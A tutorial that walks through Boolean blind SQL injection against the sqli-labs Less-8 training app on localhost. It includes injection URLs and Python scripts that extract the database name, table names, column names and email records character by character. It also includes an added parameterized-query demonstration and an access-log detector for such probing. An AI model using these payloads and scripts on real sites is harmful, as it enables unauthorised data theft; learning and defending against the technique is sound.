
An example of Boolean Blind injection in SQL injection

2025-01-18 Update From: SLTechnology News&Howtos

Shulou(Shulou.com) 05/31

This article walks through an example of Boolean blind injection in SQL injection. Many people have questions about how Boolean blind injection works in practice, so the editor consulted various materials and put together a simple, easy-to-follow procedure. I hope it helps answer those questions. Let's go through it step by step.

Boolean-based blind injection

The web page returns only one of two results, True or False. Boolean blind injection means injecting SQL and then inferring information in the database from whether the page returns True or False.

Because this is Boolean injection, manual injection alone cannot dump the database completely. So in this section we need to write a lot of code to carry out the injection and retrieve the data, and this chapter contains a lot of Python code.

The example this time is Less-8.

Run the injection test with the following statements:

    http://localhost/sqlilabs/Less-8/?id=2'
    http://localhost/sqlilabs/Less-8/?id=2"
    http://localhost/sqlilabs/Less-8/?id=2\

During testing, the page fails to display content only for id=2'. When the input satisfies the query, the page displays content, but the content is always the same. The page output is therefore useless to us as a data channel, and SQL execution errors are not shown on the page either. It is impossible to execute a SQL statement and have its result displayed on the page. This is a typical case of blind SQL injection.

We use whether the page displays content to determine whether our SQL condition is true, and from that infer the information in the database.

From the injection tests above, we know that the back-end SQL statement is written as follows:

    select field from table where id='userinput'

The id parameter is enclosed in single quotation marks. We cannot get any other information.
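The query shape above, reproduced as an added example (not code from the original article) with Python's sqlite3 standing in for the lab's MySQL back end. The table, its rows, the page text and all function names are constructed for illustration, and a string literal stands in for database(). It shows why concatenating the id turns the page into a true/false oracle, and that binding the id as a parameter removes the oracle.

```python
import sqlite3

def make_db():
    # Constructed stand-in table; the lab itself runs on MySQL.
    db = sqlite3.connect(":memory:")
    db.execute("create table users (id text, username text)")
    db.executemany("insert into users values (?, ?)",
                   [("1", "Dumb"), ("2", "Angelina")])
    return db

def page_vulnerable(db, user_input):
    # Same shape as the article's query: input pasted between single quotes.
    sql = "select username from users where id='" + user_input + "'"
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error:
        row = None  # errors are swallowed, so the page just shows nothing
    return "CONTENT" if row else ""

def page_parameterized(db, user_input):
    # The input is bound as data and is never parsed as SQL.
    row = db.execute("select username from users where id=?",
                     (user_input,)).fetchone()
    return "CONTENT" if row else ""

def oracle_leaks(page, db):
    # The page is an oracle if a true and a false condition appended to
    # the id produce different output (mirrors the length(...)>n probes).
    true_probe = "2' and length('security')>7 -- "
    false_probe = "2' and length('security')>8 -- "
    return page(db, true_probe) != page(db, false_probe)

if __name__ == "__main__":
    db = make_db()
    print("concatenated query leaks:", oracle_leaks(page_vulnerable, db))
    print("parameterized query leaks:", oracle_leaks(page_parameterized, db))
```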

Get the name of the database

Before you can get the name of the database, you first need to get the length of the database name:

    http://localhost/sqlilabs/Less-8/?id=2' and length(database())>1%23
    http://localhost/sqlilabs/Less-8/?id=2' and length(database())>2%23

and so on.

It is found that when the value is 8, the page is not displayed. So the length of database() is 8.

After you get the length of database(), you can get the name of database().

At this point you cannot rely entirely on manual injection; you have to write Python code to do it. The most important thing is to run a large number of injection tests, tell apart the cases where the statement evaluates as true from those where it evaluates as false, and from that conclude which value is the right one.

The following is simple Python code that retrieves data by Boolean blind injection.

    import requests

    def get_db_name():
        result = ""
        url_template = "http://localhost/sqlilabs/Less-8/?id=2' and ascii(substr(database(),{0},1))>{1}%23"
        # candidates must be complete and in ascending ASCII order, because the test is ">"
        chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
        for i in range(1, 9):  # positions 1..8, the length of database()
            for char in chars:
                char_ascii = ord(char)
                url = url_template.format(i, char_ascii)
                response = requests.get(url)
                length = len(response.text)
                # the length returned is only 706 and 722
                # the longer page is the first candidate for which "> char_ascii" fails: that is the character
                if length > 706:
                    result += char
                    break
        print(result)

The final result is security, which is correct.

Get the table information in the database

In fact, all SQL injection steps are similar. First get the name of the database (this step is not required), then get the table names of the current database, then get the fields of the table, and finally dump the data. These steps are explained in the previous chapter.

First, look at a simple blind-injection statement for obtaining table information:

    http://localhost/sqlilabs/Less-8/?id=2' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>60%23

We still use the earlier statement, select table_name from information_schema.tables where table_schema=database() limit 0,1, to get the table information, but now its result cannot be displayed on the page. Instead, we recover the table name by blind injection, character by character.

The next step is again to write Python code to get the table name. The code is similar to the one above; the main change is the URL. Before Python can get the table name, we also need to know the length of the table name.

The SQL injection to get the length of the table name is written as follows:

    http://localhost/sqlilabs/Less-8/?id=2' and (select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)>0%23

In this way we know that the length of the first table name in the database is 6. Once you know the length of the table name, the Python script is easy to write.

    import requests

    def get_table_name():
        result = ""
        url_template = "http://localhost/sqlilabs/Less-8/?id=2' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),{0},1))>{1}%23"
        # candidates must be complete and in ascending ASCII order, because the test is ">"
        chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
        for i in range(1, 7):  # positions 1..6, the length of the first table name
            for char in chars:
                char_ascii = ord(char)
                url = url_template.format(i, char_ascii)
                response = requests.get(url)
                length = len(response.text)
                # the length returned is only 706 and 722
                if length > 706:
                    result += char
                    break
        print(result)

Finally, the first table name is emails. If you want to get other table names, you just need to change limit 0,1 in the code to limit 1,1 and so on.

Get the column information of the table

You also need to know the length of the field names in the table before you get the column names. For example, to find the length of the field names in the emails table, we can use the following statement:

    http://localhost/sqlilabs/Less-8/?id=2' and (select length(column_name) from information_schema.columns where table_name=0x656d61696c73 limit 0,1)>[num]%23

Increase the value of num from 0 until the page no longer displays content. In this way, we find that there are two fields in emails, and the lengths of the field names are 2 and 8.

After you get the field lengths, the next step is to use Boolean injection to get the field names.

Before writing the code, let's look at how to write the SQL statement that gets the name of a field. The following statement is used to get the field name:

    http://localhost/sqlilabs/Less-8/?id=2' and ascii(substr((select column_name from information_schema.columns where table_name=0x656d61696c73 limit 0,1),1,1))>60%23

The Python code we write uses the same statement to get the field name.

    import requests

    def get_column_name():
        result = ""
        url_template = "http://localhost/sqlilabs/Less-8/?id=2' and ascii(substr((select column_name from information_schema.columns where table_name=0x656d61696c73 limit 0,1),{0},1))>{1}%23"
        # candidates must be complete and in ascending ASCII order; "_" is needed for email_id
        chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz'
        # the first field name has length 2; for the second use limit 1,1 and range(1, 9)
        for i in range(1, 3):
            for char in chars:
                char_ascii = ord(char)
                url = url_template.format(i, char_ascii)
                response = requests.get(url)
                length = len(response.text)
                # the length returned is only 706 and 722
                if length > 706:
                    result += char
                    break
        print(result)

From the code above, we find that the field names in the emails table are id and email_id.

Dump the data

After getting the field names, the next and most important step is to dump the data.

Before dumping the data, we first determine how many records there are in the emails table.

The statement used is as follows:

    http://localhost/sqlilabs/Less-8/?id=2' and (select count(*) from emails)>0%23

By changing the 0 in >0 to 1, 2, 3 and so on, we find that there are 8 records in the emails table.

Then the next step is to dump the data.

Before dumping the data, we first need to know the length of the current record, and this SQL statement is also easy to write:

    http://localhost/sqlilabs/Less-8/?id=2' and (select length(email_id) from emails limit 0,1)>15%23

Finally, we know that the length of the email_id in the first record in the emails table is 16.

Once the length is known, the code is easy to write.

    import requests

    def get_data():
        result = ""
        url_template = "http://localhost/sqlilabs/Less-8/?id=2' and ascii(substr((select email_id from emails limit 0,1),{0},1))>{1}%23"
        # candidates must be complete and in ascending ASCII order; "." and "@" occur in e-mail addresses
        chars = '.0123456789@ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz'
        for i in range(1, 17):  # positions 1..16, the length of the first email_id
            for char in chars:
                char_ascii = ord(char)
                url = url_template.format(i, char_ascii)
                response = requests.get(url)
                length = len(response.text)
                # the length returned is only 706 and 722
                if length > 706:
                    result += char
                    break
        print(result)

With the code above, you find that the content is Dumb@dhakkan.com. The other records are retrieved in the same way.
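Seen from the server side, the scripts above leave a recognisable trace: one client sends many requests to the same path, each comparing ascii(substr(...)), length(...) or count(...) against a changing number. The following added example (not part of the original article) flags that pattern in access-log lines; the log lines, the name find_blind_probing and the threshold of three probes are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample lines in common log format (not captured traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [18/Jan/2025:10:00:01 +0000] "GET /sqlilabs/Less-8/?id=2 HTTP/1.1" 200 706
10.0.0.9 - - [18/Jan/2025:10:00:02 +0000] "GET /sqlilabs/Less-8/?id=2%27%20and%20length(database())%3E7%23 HTTP/1.1" 200 706
10.0.0.9 - - [18/Jan/2025:10:00:02 +0000] "GET /sqlilabs/Less-8/?id=2%27%20and%20length(database())%3E8%23 HTTP/1.1" 200 722
10.0.0.9 - - [18/Jan/2025:10:00:03 +0000] "GET /sqlilabs/Less-8/?id=2%27%20and%20ascii(substr(database(),1,1))%3E114%23 HTTP/1.1" 200 706
10.0.0.9 - - [18/Jan/2025:10:00:03 +0000] "GET /sqlilabs/Less-8/?id=2%27%20and%20ascii(substr(database(),1,1))%3E115%23 HTTP/1.1" 200 722
10.0.0.7 - - [18/Jan/2025:10:00:04 +0000] "GET /sqlilabs/Less-8/?id=2%27%20and%20length(database())%3E1%23 HTTP/1.1" 200 706
10.0.0.5 - - [18/Jan/2025:10:00:05 +0000] "GET /sqlilabs/Less-8/?id=3 HTTP/1.1" 200 706
"""

# client, then request target; status and size are matched but not used.
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "GET (\S+) HTTP/[\d.]+" \d{3} \d+$')
# A SQL function call followed by "> number", as in the article's probes.
PROBE = re.compile(r"\b(?:ascii\s*\(\s*substr|length|count)\s*\(.*>\s*(\d+)",
                   re.I | re.S)

def find_blind_probing(log_text, min_probes=3):
    """Return {(client, path): sorted compared values} for every client that
    sent at least min_probes distinct comparison probes to one path."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE.match(line.strip())
        if not m:
            continue  # not a GET line in the expected format
        client, target = m.groups()
        path, _, query = target.partition("?")
        probe = PROBE.search(unquote_plus(query))  # decode %27, %3E, %23 ...
        if probe:
            seen[(client, path)].add(int(probe.group(1)))
    return {k: sorted(v) for k, v in seen.items() if len(v) >= min_probes}

if __name__ == "__main__":
    for (client, path), values in find_blind_probing(SAMPLE_LOG).items():
        print(client, path, "compared against", values)
```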

This concludes the worked example of Boolean blind injection in SQL injection. I hope it resolves your doubts. Combining theory with practice helps you learn, so go and try it! If you want to learn more about related topics, please continue to follow the website; the editor will keep working to bring you more practical articles.
